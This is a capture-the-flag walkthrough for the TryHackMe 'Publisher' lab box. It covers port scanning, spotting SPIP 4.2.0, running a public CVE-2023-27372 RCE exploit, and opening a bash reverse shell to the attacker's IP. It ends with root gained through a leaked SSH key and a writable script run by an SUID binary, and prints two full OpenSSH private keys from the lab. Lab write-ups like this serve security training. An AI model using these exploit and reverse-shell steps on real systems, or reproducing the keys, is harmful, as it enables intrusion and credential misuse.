Publisher TryHackMe Walkthrough
Hello guys welcome back to another walkthrough this time we are going to be tackling Publisher from tryhackme a nice beginner box by josemlwdf. We’ll start of by enumerating open ports using nmap and identifying two ports are open namely SSH (Port 22) and HTTP (Port 80). The web application seems to be using a CMS (Content Management System) called SPIP which seems to be vulnerable to unauthenticated Remote Code Execution(RCE) We’ll use an exploit from GitHub to get a shell on the box as www-data user then escalate our privileges to think use using a leaked SSH private key then lastly get root on the box by exploiting weak file permission. Without much say lets begin
Below is a brief description of this box given by the author
The “Publisher” CTF machine is a simulated environment hosting some services. Through a series of enumeration techniques, including directory fuzzing and version identification, a vulnerability is discovered, allowing for Remote Code Execution (RCE). Attempts to escalate privileges using a custom binary are hindered by restricted access to critical system files and directories, necessitating a deeper exploration into the system’s security profile to ultimately exploit a loophole that enables the execution of an unconfined bash shell and achieve privilege escalation
As always we’ll start off by running an nmap scan on the box to discover the ports that are open. The command used was
nmap -sC -sV 10.10.242.225nmap -sC -sV 10.10.242.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-29 13:04 EAT
Nmap scan report for 10.10.242.225
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Publisher's Pulse: SPIP Insights & Tips
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.82 secondsAbove we can see the two open ports. (Always run a full port scan afterwards since it’s easy missing open ports. I’ve missed some before which doing CTF’s and boxes though this isn’t required in this box). We cannot begin with enumerate SSH because we need to have valid credentials or at least a valid username for a brute force attack to be performed. Though most secure systems of late have password policies enforced with a maximum number of failed login attempts followed by account lockouts.
My focus will be on HTTP right now. On opening the web application we get a standard web page
On running directory brute forcing using ffuf we get a directory called spip. The command used was
ffuf -u http://10.10.163.99/FUZZ -e .php,.txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txtffuf -u http://10.10.163.99/FUZZ -e .php,.txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.163.99/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
:: Extensions : .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 346ms]
images [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 333ms]
.html.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 332ms]
.html.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 335ms]
.htm.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 310ms]
.htm.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 310ms]
.htm [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 311ms]
.html [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3015ms]
. [Status: 200, Size: 8686, Words: 1334, Lines: 151, Duration: 283ms]
.htaccess.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 293ms]
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 293ms]
.htaccess.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 296ms]
.phtml [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 296ms]
.htc [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 282ms]
.htc.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 283ms]
.htc.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 280ms]
.html_var_DE.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 289ms]
.html_var_DE.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 289ms]
.html_var_DE.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 289ms]
.html_var_DE [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 292ms]
spip [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 280ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 288ms]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 277ms]
.htpasswd.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 284ms]
.htpasswd.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 283ms]Navigating to /spip/ directory we get another article called publisher
How did i identity which CMS it was. I just took spip.php and googled for the CMS on google
Continuing to look though the pages we see that the application might be vulnerable to unauthenticated remote code execution
We have now identified that the CMS is called SPIP but which version are we running. I found a SPIP CMS scanner on GitHub thought the application last update date was in 2015–2016. Below is the link to the scanner.
I knew that it should have a way of idenitfying the CMS version. I decided to look at the code for the tool to see how it identifies the CMS version and the below code sticks out like a sore thump detect_version()
def detect_version(req):
if 'composed-by' in req.headers:
res = detect_version_with_header(req.headers['composed-by'])
if not res:
res = detect_version_in_html(req.content)
if res:
return
if opts.force:
print("Doesn't seem to be a SPIP install!")
else:
raise Exception('Are you sure it is a SPIP install?')From the response headers we can get the version of SPIP installed on the server. Looking the the requests passing through burpsuite we get that the version running on the server is 4.2.0
Next step is looking for an exploit for that specific version of the application and we found a GitHub page with the exploit
I git cloned the project to my local machine using the below command
git clone https://github.com/Chocapikk/CVE-2023-27372.git
Cloning into 'CVE-2023-27372'...
remote: Enumerating objects: 25, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 25 (delta 4), reused 7 (delta 2), pack-reused 11
Receiving objects: 100% (25/25), 14.20 KiB | 156.00 KiB/s, done.
Resolving deltas: 100% (6/6), done.Next i installed all the required libraries using the following command
pip install -r requirements.txt
To run the tool i used the following command
python CVE-2023-27372.py -u http://10.10.163.99/spip/ -v -o report.txtLooking at the screenshot below we get remote code execution on the server
Next is getting a reverse shell on the box and the command i used was
bash -c "bash -i >& /dev/tcp/10.8.84.177/9001 0>&1"After setting up a netcat listener on port 9001 and we get a reverse shell
nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.8.84.177] from (UNKNOWN) [10.10.163.99] 58864
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@41c976e507f8:/home/think/spip/spip$ We have a shell as the www-data user on the server and we seem to have landed on a docker container. Doing some manual enumeration we discover a SSH private key in think’s home directory and we have read access to the private key
I copied the key to my box
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----Trying to SSH to the box with the key it worked we have escaped the docker container. The command used was (Ensure you give the private key the correct permissions)
ssh -i think.ssh think@10.10.163.99
Running lipeas we get an SUID binary that seems to called a bash scrip which we have write access to
Given we can modify /opt/run_container.sh. Trying to see if i could read the root directory by changing the code in /opt/run_container.sh
I made the changes then saved the script. On running the binary we see that we are able to list the root directory
Looking keenly at the directories we see there’s a .ssh directory. I tried to see if there’s a private key by doing another directory listing
We see that there’s a private key most probably belonging to the root user
I dumped the key by again changing the script as seen below
We get the private key for the root user
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----We gave the key the appropriate permissions
Tried to SSH to the box as the root user using the command
ssh -i root.ssh root@10.10.163.99
It works we managed to login to the box as the root user and get the flags
